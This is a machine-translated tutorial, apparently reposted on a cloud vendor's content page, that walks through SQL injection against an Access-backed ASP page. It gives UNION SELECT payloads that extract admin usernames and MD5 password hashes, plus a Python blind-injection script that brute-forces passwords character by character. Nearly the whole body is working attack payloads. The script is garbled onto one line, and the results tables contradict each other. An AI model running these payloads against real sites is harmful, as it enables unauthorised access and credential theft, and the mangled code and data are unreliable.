Web security ACCESS Injection, blind footnote book

Source: Internet
Author: User

Http://www.xxx.cn/cp.asp?classid=3
Http://www.xxx.cn/cp.asp?classid=3 and//blocking keyword
Http://www.xxx.cn/cp.asp?classid=3 and 1=1//capitalization bypass
Http://www.xxx.cn/cp.asp?classid=3 and 1=2
Http://www.xxx.cn/cp.asp?classid=3 ORDER by 8%16//Normal
Http://www.xxx.cn/cp.asp?classid=3 ORDER by 9%16//Error
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,2,3,4,5,6,7,8 from ADMIN%16//return to normal, burst can display bit 2, indicating the presence of the ADMIN table
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,id,3,4,5,6,7,8 from admin%16//return 4,5,7 descriptions have three users, respectively, with an ID of 4,5,7

http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 1 1,admin,3,4,5,6,7,8 from admin%16//lxiaofu
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 2 1,admin,3,4,5,6,7,8 from admin%16//admin
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 3 1,admin,3,4,5,6,7,8 from admin%16//admin8
Or
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=4%16//lxiaofu
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=5%16//admin
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=7%16//admin8
Again or
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin%16//Burst Admin,admin8,lxiaofu

http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,pwd,3,4,5,6,7,8 from admin%16//Burst 4817cc8dcbb3fb5,ae0284ccc20bdde, bbd06203b2ba922


To organize the current results:
ID admin pwd
4 Lxiaofu bbd06203b2ba922
5 Admin Ae0284ccc20bdde
7 Admin8 4817CC8DCBB3FB5

But the above MD5 ciphertext are 15 bits, the normal should be 16 bit or 32 bit:

First look at the length of the PWD field:
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,len (pwd), 3,4,5,6,7,8 from ADMIN%16//return 16, indicating ciphertext is 16 bits

Known ciphertext is 16 bits, then to intercept the 16th bit, the condition is ID
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid (pwd,16,1), 3,4,5,6,7,8 from ADMIN WHERE id=4%16//f
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid (pwd,16,1), 3,4,5,6,7,8 from ADMIN WHERE id=5%16//8
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid (pwd,16,1), 3,4,5,6,7,8 from ADMIN WHERE id=7%16//c
Or
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1, (select MID (pwd,16,1) from admin WHERE id=4), 3,4,5,6,7,8 from admin%16 F
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1, (select MID (pwd,16,1) from admin WHERE id=5), 3,4,5,6,7,8 from admin%16 8
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1, (select MID (pwd,16,1) from admin WHERE id=7), 3,4,5,6,7,8 from admin%16 C


To organize the current results:
ID admin pwd
4 Lxiaofu bbd06203b2ba922f
5 Admin 4817cc8dcbb3fb58
7 Admin8 Ae0284ccc20bddec


Or use the test blind footnote book:

Import requestsheads = {' user-agent ': ' mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) gecko/20100101 firefox/52.0 '}payloads= ' [email protected]_. ' Pwd=[]for i in range (1,17): For    payload in payloads:        URL = "http://www.xxx.cn/cp.asp?classid=24 and ASC ((SELECT T OP 1 MID (pwd,{},1) from admin) ={} ". Format (I,ord (payload))        response= (Requests.get (url=url,headers=heads). Content). Decode (encoding= ' GBK ')        # print (URL)        if str ("? product_id=194 ") in response:            pwd.append (payload)            print (' \ n ', ' pwd is: ', payload,end= ')            break        Else : Print ('            . ', end= ') print (' \ n [done] pwd: ', '. Join ([i-I in PWD])

  

Web security ACCESS Injection, blind footnote book

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.